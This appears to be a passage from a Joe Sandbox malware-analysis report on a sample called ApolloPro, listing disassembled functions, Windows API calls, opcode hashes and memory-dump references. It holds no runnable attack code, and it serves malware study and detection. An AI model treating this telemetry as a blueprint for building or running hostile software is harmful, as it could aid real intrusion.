                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                              • String ID:
                                                                                              • API String ID: 2427264223-0
                                                                                              • Opcode ID: d09cdeabfddd3891952c75cafa1528d7526bd524df7726e8e2f1d8837a315f60
                                                                                              • Instruction ID: 472ff58825e6341a497a574fef4a26a66efb1a8f2f2628e06e02c895ffb279f3
                                                                                              • Opcode Fuzzy Hash: d09cdeabfddd3891952c75cafa1528d7526bd524df7726e8e2f1d8837a315f60
                                                                                              • Instruction Fuzzy Hash: 3EB09231000208BBDB412F11DC0A8583F2AFB00AD1F004024FC0888131DB72AAD29A84
                                                                                              Function 006AC355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString$__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 207118244-0
                                                                                              • Opcode ID: 6e8b2006b725b98d76ce5f328853c53c7230e07960298ec6bb7f6354a99725b8
                                                                                              • Instruction ID: 4df3d942c97d57223cc75be5ab1cb4132988879777362b07aab2f4441d450d9e
                                                                                              • Opcode Fuzzy Hash: 6e8b2006b725b98d76ce5f328853c53c7230e07960298ec6bb7f6354a99725b8
                                                                                              • Instruction Fuzzy Hash: 85B12B34A0010AAFCF14EF98C8519EDB7B6FF59720F10815AF915AB291EB70AD52CF94
                                                                                              Function 0064343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID:
                                                                                              • API String ID: 4104443479-0
                                                                                              • Opcode ID: d0610ac13a79df7fd6fcea0f9a88704d7ba0b831ea08fdd2daeb19c394a1f8b3
                                                                                              • Instruction ID: 7346ea65b7ab501fb7d0cefb0be6c8a6dc9d1692fd5731742a33ec2fcb8164b8
                                                                                              • Opcode Fuzzy Hash: d0610ac13a79df7fd6fcea0f9a88704d7ba0b831ea08fdd2daeb19c394a1f8b3
                                                                                              • Instruction Fuzzy Hash: CA31C375204622DFD728DF18D040AA1F7E2FF08320B14C56DE98A8B791DB30DC82CB94
                                                                                              Function 0066E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClearVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1473721057-0
                                                                                              • Opcode ID: 2c703c1c683ac4e6b791e08d20a2c9d70dde80e23316801f1f7f0fdfe4ddb387
                                                                                              • Instruction ID: b78b6f6019f00818c78432e234068f3736a8d3e80344a09c70a033157f78eb42
                                                                                              • Opcode Fuzzy Hash: 2c703c1c683ac4e6b791e08d20a2c9d70dde80e23316801f1f7f0fdfe4ddb387
                                                                                              • Instruction Fuzzy Hash: 36410774508341DFDB14DF14C484B5ABBE2BF45318F1988ACF88A9B362C772E885CB96
                                                                                              Function 006449C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00644B29: FreeLibrary.KERNEL32(00000000,?), ref: 00644B63
                                                                                                • Part of subcall function 0065547B: __wfsopen.LIBCMT ref: 00655486
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006427AF,?,00000001), ref: 006449F4
                                                                                                • Part of subcall function 00644ADE: FreeLibrary.KERNEL32(00000000), ref: 00644B18
                                                                                                • Part of subcall function 006448B0: _memmove.LIBCMT ref: 006448FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 1396898556-0
                                                                                              • Opcode ID: fccca534faea8ede9cef11098555bd3b2be46587fe65e4eac3ed53586536e81a
                                                                                              • Instruction ID: 53166d3f415ee1934cb56f7b07ab1f3906645fd1f9e4faf0501d67c2f80bf973
                                                                                              • Opcode Fuzzy Hash: fccca534faea8ede9cef11098555bd3b2be46587fe65e4eac3ed53586536e81a
                                                                                              • Instruction Fuzzy Hash: 61112732650205ABEF50FB74CC07FEE73ABAF40701F10442DF941A6281EE708A45A798
                                                                                              Function 0066E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClearVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1473721057-0
                                                                                              • Opcode ID: ceae8b6ee163509702fbebdd6fbd3e29c323107158f3269187c3caf86c56856e
                                                                                              • Instruction ID: 38d49ca4e61d98642fd2b04c804b3ff884769b288c0e88338c2585e7e6756975
                                                                                              • Opcode Fuzzy Hash: ceae8b6ee163509702fbebdd6fbd3e29c323107158f3269187c3caf86c56856e
                                                                                              • Instruction Fuzzy Hash: 802114B4508341EFDB54DF54C444B5ABBE2BF89304F06896CF88A5B362C731E849CB96
                                                                                              Function 00641A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID:
                                                                                              • API String ID: 4104443479-0
                                                                                              • Opcode ID: 76d5dfd19126f7aba3bb295fb5ed34499109e4abbdc830f683e47744b2f34f36
                                                                                              • Instruction ID: b147484886c6d958683d257a59fd69ab8c349c8423c146da1ae186037b9a275d
                                                                                              • Opcode Fuzzy Hash: 76d5dfd19126f7aba3bb295fb5ed34499109e4abbdc830f683e47744b2f34f36
                                                                                              • Instruction Fuzzy Hash: AB01D672211702AED3645F38DC02B67BB99DB457A0F10892EF91ACE1D1EA31E4848794
                                                                                              Function 006A495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 006A4998
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID:
                                                                                              • API String ID: 1431749950-0
                                                                                              • Opcode ID: 8a9574e37c10abc31f3cb413fab5abe0274c2ee974301fb7580ff610cfa5feb5
                                                                                              • Instruction ID: 71e4678764b5c1f1b4157078df2025eab0acdc75759b38bd4ff4f95fcd47eb61
                                                                                              • Opcode Fuzzy Hash: 8a9574e37c10abc31f3cb413fab5abe0274c2ee974301fb7580ff610cfa5feb5
                                                                                              • Instruction Fuzzy Hash: F4F08135608204AF9B50FB65D806DAF77BDEF45320B000059F804DB291DE70BD41CB54
                                                                                              Function 00644A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _fseek
                                                                                              • String ID:
                                                                                              • API String ID: 2937370855-0
                                                                                              • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                              • Instruction ID: 3db07aa804f7cc87638f41e059ec0c24568e9c0dddaff37121ca81db58abcf31
                                                                                              • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                              • Instruction Fuzzy Hash: F0F085B6800208BFDF109F84DC05DEBBB7AEF89320F00459CF9045A210D232EA258BA0
                                                                                              Function 00644A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,?,?,006427AF,?,00000001), ref: 00644A63
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 5ebae91a70416a57364d0bfecee3f7616bb8ec980b0519142b96ab09dc2bf78f
                                                                                              • Instruction ID: 1a22fb4caa1c4a82539bc906ffbe3596d008a5008b6e605a771df751b5835e5a
                                                                                              • Opcode Fuzzy Hash: 5ebae91a70416a57364d0bfecee3f7616bb8ec980b0519142b96ab09dc2bf78f
                                                                                              • Instruction Fuzzy Hash: CEF01571145701CFCB349F64E495966BBF2AF14366324992EE1D783614CB31A984DB44
                                                                                              Function 00644AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock
                                                                                              • String ID:
                                                                                              • API String ID: 2638373210-0
                                                                                              • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                              • Instruction ID: 2494a5860772135cd878e2d76efaf2dec09b05c5b4fb45b0a490206e0ede8303
                                                                                              • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                              • Instruction Fuzzy Hash: 3DF0F87240020DFFDF45DF90C945EAABB7AFB14314F208589FD198A212D736EA61AB91
                                                                                              Function 006509C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006509E4
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongNamePath_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2514874351-0
                                                                                              • Opcode ID: b0eae063db7e72ec56613ae3ea9a5b26949dc1a0b02212c4e4cac653ad121c2c
                                                                                              • Instruction ID: d18303f4eca1f52f8f5a9ecd36b045c8eaafcb04e2734525357ef365ca8a1b24
                                                                                              • Opcode Fuzzy Hash: b0eae063db7e72ec56613ae3ea9a5b26949dc1a0b02212c4e4cac653ad121c2c
                                                                                              • Instruction Fuzzy Hash: F5E086329001285BC72196989C05FEA77DEDB89690F0401B6FC0CD7204D961AC8186D5
                                                                                              Function 00694D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00694D31
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderPath_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3334745507-0
                                                                                              • Opcode ID: 75434047ef37ae135498114ee77c57fb48fefe9fb48013fa1cf70620ccbe7a1d
                                                                                              • Instruction ID: bab84d9cbbad45a9befe4c473b1f2a127b4e8692d921ed6d18face509ed9c692
                                                                                              • Opcode Fuzzy Hash: 75434047ef37ae135498114ee77c57fb48fefe9fb48013fa1cf70620ccbe7a1d
                                                                                              • Instruction Fuzzy Hash: C3D05EA190032C6FEB64E6A49C0DDFB7BADD744221F0006A57C5CC3101E9249D8586E0
                                                                                              Function 006977C2 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000677A8,00000000,00000000,?), ref: 006977DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2422867632-0
                                                                                              • Opcode ID: e8bc4638f8319601b8a5c1c78193cf6803990f4384c4ca5b72dc710f2fca9e23
                                                                                              • Instruction ID: c63a24d81da3cdcba82e17979b11689c89173aa6a3bf2700f9a26570f3968722
                                                                                              • Opcode Fuzzy Hash: e8bc4638f8319601b8a5c1c78193cf6803990f4384c4ca5b72dc710f2fca9e23
                                                                                              • Instruction Fuzzy Hash: BED01271438318BF6B2C8BA4DC46CB7769DE905221340136EB805C1A00E6A1BC0086A0
                                                                                              Function 0065547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wfsopen
                                                                                              • String ID:
                                                                                              • API String ID: 197181222-0
                                                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                              • Instruction ID: d7eaa209e6e0ca8a2f90be560d394540787a1ba0556148270b7179fd8c4193cb
                                                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                              • Instruction Fuzzy Hash: ACB0927644020C77CE012A82EC03A693B6A9B40769F408020FF0C1C162A673A6A49689
                                                                                              Function 00653588 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _doexit.LIBCMT ref: 00653592
                                                                                                • Part of subcall function 00653459: __lock.LIBCMT ref: 00653467
                                                                                                • Part of subcall function 00653459: DecodePointer.KERNEL32(006ECB70,0000001C,006533B2,00651003,00000001,00000000,?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 006534A6
                                                                                                • Part of subcall function 00653459: DecodePointer.KERNEL32(?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 006534B7
                                                                                                • Part of subcall function 00653459: EncodePointer.KERNEL32(00000000,?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 006534D0
                                                                                                • Part of subcall function 00653459: DecodePointer.KERNEL32(-00000004,?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 006534E0
                                                                                                • Part of subcall function 00653459: EncodePointer.KERNEL32(00000000,?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 006534E6
                                                                                                • Part of subcall function 00653459: DecodePointer.KERNEL32(?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 006534FC
                                                                                                • Part of subcall function 00653459: DecodePointer.KERNEL32(?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 00653507
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                              • String ID:
                                                                                              • API String ID: 2158581194-0
                                                                                              • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                              • Instruction ID: 39f4fe3bfac32020100cff6ab00b2b3f1ef3585aa94896713844ed1314575325
                                                                                              • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                              • Instruction Fuzzy Hash: 0EB0123198030C33DA112541EC03F193B4D4740F90F100020FE0C1C2E1A5E3766445CD

                                                                                              Non-executed Functions

                                                                                              Function 006BD164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 006BD208
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006BD249
                                                                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 006BD28E
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006BD2B8
                                                                                              • SendMessageW.USER32 ref: 006BD2E1
                                                                                              • _wcsncpy.LIBCMT ref: 006BD359
                                                                                              • GetKeyState.USER32(00000011), ref: 006BD37A
                                                                                              • GetKeyState.USER32(00000009), ref: 006BD387
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006BD39D
                                                                                              • GetKeyState.USER32(00000010), ref: 006BD3A7
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006BD3D0
                                                                                              • SendMessageW.USER32 ref: 006BD3F7
                                                                                              • SendMessageW.USER32(?,00001030,?,006BB9BA), ref: 006BD4FD
                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 006BD513
                                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 006BD526
                                                                                              • SetCapture.USER32(?), ref: 006BD52F
                                                                                              • ClientToScreen.USER32(?,?), ref: 006BD594
                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006BD5A1
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006BD5BB
                                                                                              • ReleaseCapture.USER32 ref: 006BD5C6
                                                                                              • GetCursorPos.USER32(?), ref: 006BD600
                                                                                              • ScreenToClient.USER32(?,?), ref: 006BD60D
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 006BD669
                                                                                              • SendMessageW.USER32 ref: 006BD697
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 006BD6D4
